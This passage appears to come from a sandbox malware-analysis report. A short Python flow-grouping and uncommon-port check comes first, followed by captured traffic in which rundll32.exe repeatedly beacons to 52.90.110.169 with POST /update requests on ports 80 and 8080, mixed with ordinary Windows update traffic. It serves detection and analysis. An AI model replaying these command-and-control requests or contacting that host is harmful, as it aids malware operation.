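        outbound = sip == home
        key = (sport, dip, dport) if outbound else (dport, sip, sport)
        flow = flows.setdefault(key, {"out": 0, "in": 0, "first": when, "last": when})
        flow["out" if outbound else "in"] += 1
        flow["first"] = min(flow["first"], when)
        flow["last"] = max(flow["last"], when)
    return flows


def duration(flow):
    """Seconds between the first and last packet seen for one flow."""
    return (flow["last"] - flow["first"]).total_seconds()


def uncommon_port_flows(flows, common=COMMON_PORTS):
    """Flow keys whose server port is outside the allow-list."""
    return [key for key in flows if key[2] not in common]


if __name__ == "__main__":
    flows = build_flows(SAMPLE_ROWS)
    for (cport, server, sport), f in flows.items():
        print(f"{cport} -> {server}:{sport:<5} out={f['out']} in={f['in']} "
              f"{duration(f):7.3f}s")
    print("uncommon server ports:", uncommon_port_flows(flows))
```

On the subset above this yields four flows; the two 8080 flows are the ones the uncommon-port check returns, and the 49730/80 flow spans about 21.7 s because the VM's first packet at 17:56:38 is not answered with data until 17:56:59.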
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Jul 25, 2024 17:54:26.117017031 CEST | 58485 | 53 | 192.168.2.6 | 8.8.8.8
                            Jul 25, 2024 17:54:26.127499104 CEST | 53 | 58485 | 8.8.8.8 | 192.168.2.6
                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                            Jul 25, 2024 17:54:26.117017031 CEST | 192.168.2.6 | 8.8.8.8 | 0x296e | Standard query (0) | ec2-52-90-110-169.compute-1.amazonaws.com | A (IP address) | IN (0x0001) | false
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            Jul 25, 2024 17:54:26.127499104 CEST | 8.8.8.8 | 192.168.2.6 | 0x296e | No error (0) | ec2-52-90-110-169.compute-1.amazonaws.com | | 52.90.110.169 | A (IP address) | IN (0x0001) | false
                            • slscr.update.microsoft.com
                            • 52.90.110.169
                            • 52.90.110.169:8080
                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            0 | 192.168.2.6 | 49711 | 52.90.110.169 | 80 | 2144 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 25, 2024 17:54:26.153551102 CEST | 72 | OUT | Data Raw: 1c 31 eb 1f 02 ae 8f 4a 5c 0d 9f 9b e6 c2 e4 cd 26 78 fd c3 a5 4b b2 3b f7 c7 97 9b a7 96 d9 af f9 db b9 9c f3 e1 d6 59 27 c0 ab 6f 6c b2 18 0b 3f 90 98 c2 1f 6a 4a ac 87 32 3b f0 31 8f 73 67 56 5d e3 55 ff 35 9a af
                            Data Ascii: 1J\&xK;Y'ol?jJ2;1sgV]U5


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            1 | 192.168.2.6 | 49718 | 52.90.110.169 | 80 | 2144 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 25, 2024 17:54:49.663119078 CEST | 258 | OUT | POST /update?id=d791f282 HTTP/1.1
                            Accept: */*
                            X-Session: 0
                            X-Status: 0
                            X-Size: 61456
                            X-Sn: 1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
                            Host: 52.90.110.169
                            Content-Length: 0
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            2 | 192.168.2.6 | 49721 | 52.90.110.169 | 80 | 2144 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 25, 2024 17:55:12.066039085 CEST | 258 | OUT | POST /update?id=36ebb732 HTTP/1.1
                            Accept: */*
                            X-Session: 0
                            X-Status: 0
                            X-Size: 61456
                            X-Sn: 1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
                            Host: 52.90.110.169
                            Content-Length: 0
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            3 | 192.168.2.6 | 49723 | 52.90.110.169 | 80 | 2144 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 25, 2024 17:55:34.477086067 CEST | 258 | OUT | POST /update?id=8a8b3aa5 HTTP/1.1
                            Accept: */*
                            X-Session: 0
                            X-Status: 0
                            X-Size: 61456
                            X-Sn: 1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
                            Host: 52.90.110.169
                            Content-Length: 0
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            4 | 192.168.2.6 | 49726 | 52.90.110.169 | 8080 | 2144 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 25, 2024 17:56:15.027879000 CEST | 263 | OUT | POST /update?id=dc53bbb9 HTTP/1.1
                            Accept: */*
                            X-Session: 0
                            X-Status: 0
                            X-Size: 61456
                            X-Sn: 1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
                            Host: 52.90.110.169:8080
                            Content-Length: 0
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            5 | 192.168.2.6 | 49728 | 52.90.110.169 | 8080 | 2144 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 25, 2024 17:56:24.070729971 CEST | 263 | OUT | POST /update?id=71f3cbf7 HTTP/1.1
                            Accept: */*
                            X-Session: 0
                            X-Status: 0
                            X-Size: 61456
                            X-Sn: 1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
                            Host: 52.90.110.169:8080
                            Content-Length: 0
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            6 | 192.168.2.6 | 49729 | 52.90.110.169 | 8080 | 2144 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 25, 2024 17:56:33.110414028 CEST | 263 | OUT | POST /update?id=01b63ea5 HTTP/1.1
                            Accept: */*
                            X-Session: 0
                            X-Status: 0
                            X-Size: 61456
                            X-Sn: 1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
                            Host: 52.90.110.169:8080
                            Content-Length: 0
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            7 | 192.168.2.6 | 49730 | 52.90.110.169 | 80 | 2144 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 25, 2024 17:56:38.510205984 CEST | 70 | OUT | Data Raw: 88 d4 5c 25 2f 8e 05 9c ae e6 ef 35 f2 17 f2 19 7e 31 e1 ef cb fd 60 c6 87 b1 12 35 4f 2c 3e 67 65 6a 84 ee ef 84 d7 28 e0 a8 59 a7 c9 1a f8 7d 0d 06 a4 2b f2 00 c5 24 60 a6 26 60 13 f9 9a 52 10 91 11 ab 02 67
                            Data Ascii: \%/5~1`5O,>gej(Y}+$`&`Rg


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            8 | 192.168.2.6 | 49732 | 52.90.110.169 | 80 | 2144 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 25, 2024 17:57:01.982738972 CEST | 258 | OUT | POST /update?id=6171a2b6 HTTP/1.1
                            Accept: */*
                            X-Session: 0
                            X-Status: 0
                            X-Size: 61456
                            X-Sn: 1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
                            Host: 52.90.110.169
                            Content-Length: 0
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            9 | 192.168.2.6 | 49733 | 52.90.110.169 | 80 | 2144 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 25, 2024 17:57:07.014034986 CEST | 258 | OUT | POST /update?id=592b1d5c HTTP/1.1
                            Accept: */*
                            X-Session: 0
                            X-Status: 0
                            X-Size: 61456
                            X-Sn: 1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
                            Host: 52.90.110.169
                            Content-Length: 0
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            10 | 192.168.2.6 | 49734 | 52.90.110.169 | 80 | 2144 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 25, 2024 17:57:12.045528889 CEST | 258 | OUT | POST /update?id=7e9d30a3 HTTP/1.1
                            Accept: */*
                            X-Session: 0
                            X-Status: 0
                            X-Size: 61456
                            X-Sn: 1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;
                            Host: 52.90.110.169
                            Content-Length: 0
                            Connection: Keep-Alive
                            Cache-Control: no-cache


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            11 | 192.168.2.6 | 49735 | 52.90.110.169 | 80 | 2144 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 25, 2024 17:57:17.572288990 CEST | 20 | OUT | Data Raw: a1 1b 31 8b 6a 76 e9 a4 aa 7f 9c dd 02 a7 7c 07 4c fc 70 37
                            Data Ascii: 1jv|Lp7


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            0 | 192.168.2.6 | 49710 | 40.113.110.67 | 443
                            Timestamp | Bytes transferred | Direction | Data
                            2024-07-25 15:54:18 UTC | 71 | OUT | Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4b 39 65 6e 6f 36 68 70 4e 6b 47 49 37 6d 73 52 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 63 33 33 63 65 62 30 66 32 33 32 30 63 33 33 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 305MS-CV: K9eno6hpNkGI7msR.1Context: 9c33ceb0f2320c33
                            2024-07-25 15:54:18 UTC | 249 | OUT | Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                            2024-07-25 15:54:18 UTC | 1064 | OUT | Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 4b 39 65 6e 6f 36 68 70 4e 6b 47 49 37 6d 73 52 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 63 33 33 63 65 62 30 66 32 33 32 30 63 33 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 63 42 32 5a 68 6b 70 56 44 68 71 43 58 4d 2f 41 68 63 67 6b 4f 78 43 54 4a 6a 45 46 75 64 67 4a 35 66 46 38 48 65 63 52 6e 2b 57 54 32 54 34 37 7a 6d 63 77 51 62 62 43 6c 37 39 34 57 41 42 48 71 72 45 5a 67 74 46 71 35 53 6e 50 68 74 4b 41 4a 51 4d 46 2b 79 57 64 4a 6c 50 64 76 72 6c 6d 5a 69 68 72 34 72 4f 37 4b 4e 62 62
                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: K9eno6hpNkGI7msR.2Context: 9c33ceb0f2320c33<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZcB2ZhkpVDhqCXM/AhcgkOxCTJjEFudgJ5fF8HecRn+WT2T47zmcwQbbCl794WABHqrEZgtFq5SnPhtKAJQMF+yWdJlPdvrlmZihr4rO7KNbb
                            2024-07-25 15:54:18 UTC | 218 | OUT | Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4b 39 65 6e 6f 36 68 70 4e 6b 47 49 37 6d 73 52 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 63 33 33 63 65 62 30 66 32 33 32 30 63 33 33 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: K9eno6hpNkGI7msR.3Context: 9c33ceb0f2320c33<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            1 | 192.168.2.6 | 49710 | 40.113.110.67 | 443 | 2144 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-07-25 15:54:18 UTC | 14 | IN | Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
                            2024-07-25 15:54:18 UTC | 58 | IN | Data Raw: 4d 53 2d 43 56 3a 20 46 50 73 63 48 34 48 72 56 30 36 74 36 6b 4c 64 31 6d 4e 5a 57 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: FPscH4HrV06t6kLd1mNZWA.0Payload parsing failed.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            2 | 192.168.2.6 | 49712 | 40.113.110.67 | 443
                            Timestamp | Bytes transferred | Direction | Data
                            2024-07-25 15:54:27 UTC | 71 | OUT | Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 37 37 57 4a 58 5a 34 4a 46 6b 65 6f 54 32 6c 67 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 66 30 35 65 66 65 39 61 38 39 39 62 63 34 34 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 305MS-CV: 77WJXZ4JFkeoT2lg.1Context: 7f05efe9a899bc44
                            2024-07-25 15:54:27 UTC | 249 | OUT | Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                            2024-07-25 15:54:27 UTC | 1064 | OUT | Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 37 37 57 4a 58 5a 34 4a 46 6b 65 6f 54 32 6c 67 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 66 30 35 65 66 65 39 61 38 39 39 62 63 34 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 63 42 32 5a 68 6b 70 56 44 68 71 43 58 4d 2f 41 68 63 67 6b 4f 78 43 54 4a 6a 45 46 75 64 67 4a 35 66 46 38 48 65 63 52 6e 2b 57 54 32 54 34 37 7a 6d 63 77 51 62 62 43 6c 37 39 34 57 41 42 48 71 72 45 5a 67 74 46 71 35 53 6e 50 68 74 4b 41 4a 51 4d 46 2b 79 57 64 4a 6c 50 64 76 72 6c 6d 5a 69 68 72 34 72 4f 37 4b 4e 62 62
                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: 77WJXZ4JFkeoT2lg.2Context: 7f05efe9a899bc44<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZcB2ZhkpVDhqCXM/AhcgkOxCTJjEFudgJ5fF8HecRn+WT2T47zmcwQbbCl794WABHqrEZgtFq5SnPhtKAJQMF+yWdJlPdvrlmZihr4rO7KNbb
                            2024-07-25 15:54:27 UTC | 218 | OUT | Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 37 37 57 4a 58 5a 34 4a 46 6b 65 6f 54 32 6c 67 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 66 30 35 65 66 65 39 61 38 39 39 62 63 34 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: 77WJXZ4JFkeoT2lg.3Context: 7f05efe9a899bc44<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            3 | 192.168.2.6 | 49712 | 40.113.110.67 | 443 | 2144 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-07-25 15:54:27 UTC | 14 | IN | Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
                            2024-07-25 15:54:27 UTC | 58 | IN | Data Raw: 4d 53 2d 43 56 3a 20 66 62 6e 6b 73 37 48 50 49 55 4b 35 4a 31 4e 5a 42 53 6f 6e 78 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: fbnks7HPIUK5J1NZBSonxQ.0Payload parsing failed.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            4 | 192.168.2.6 | 49713 | 52.165.165.26 | 443
                            Timestamp | Bytes transferred | Direction | Data
                            2024-07-25 15:54:31 UTC | 306 | OUT | GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=O4c6ORKy9SdKx5O&MD=tSDbY3yp HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                            Host: slscr.update.microsoft.com


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            5 | 192.168.2.6 | 49713 | 52.165.165.26 | 443 | 2144 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-07-25 15:54:31 UTC | 560 | IN | HTTP/1.1 200 OK
                            Cache-Control: no-cache
                            Pragma: no-cache
                            Content-Type: application/octet-stream
                            Expires: -1
                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                            MS-CorrelationId: f1bf5615-4080-4f85-a60f-87c6bd9ada5b
                            MS-RequestId: 91d766e7-41e7-4248-a1b9-86da4bd910ed
                            MS-CV: A5Pr0fdT/Euv0RCd.0
                            X-Microsoft-SLSClientCache: 2880
                            Content-Disposition: attachment; filename=environment.cab
                            X-Content-Type-Options: nosniff
                            Date: Thu, 25 Jul 2024 15:54:30 GMT
                            Connection: close
                            Content-Length: 24490
                            2024-07-25 15:54:31 UTC | 15824 | IN | Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                            Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                            2024-07-25 15:54:31 UTC | 8666 | IN | Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                            Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            6 | 192.168.2.6 | 49717 | 40.113.110.67 | 443
                            Timestamp | Bytes transferred | Direction | Data
                            2024-07-25 15:54:40 UTC | 71 | OUT | Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 68 35 30 71 6c 4a 51 66 6e 30 75 31 49 70 73 67 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 37 63 34 63 35 61 31 31 33 33 39 38 65 33 35 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 305MS-CV: h50qlJQfn0u1Ipsg.1Context: 37c4c5a113398e35
                            2024-07-25 15:54:40 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
